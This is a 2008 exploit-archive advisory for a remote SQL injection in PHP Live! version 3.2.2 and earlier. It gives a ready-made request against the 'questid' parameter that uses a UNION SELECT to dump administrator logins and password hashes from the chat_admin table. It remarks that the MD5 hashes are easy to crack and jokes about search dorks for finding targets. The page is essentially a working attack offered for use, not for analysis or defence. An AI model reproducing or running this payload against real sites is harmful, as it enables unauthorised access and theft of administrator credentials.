PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability
# Published : 2008-02-14
# Author : Xar
# Previous Title : freePHPgallery 0.6 Cookie Local File Inclusion Vulnerability
# Next Title : Affiliate Market Ver.0.1 BETA (language) Local File Inclusion Vulnerability

[!]Info[!]

PHP Live! (?? OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website.

[!]SQL Injection[!]

Code:
phplive//admin/traffic/knowledg
e_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a

[!]Info[!]
+Hashes are regular md5 - easy to crack


Dork: "Find your own ;)"

Credits -

Found by Xar of h4ck-y0u

Greets to Don & ViSiOn

# www.Syue.com [2008-02-14]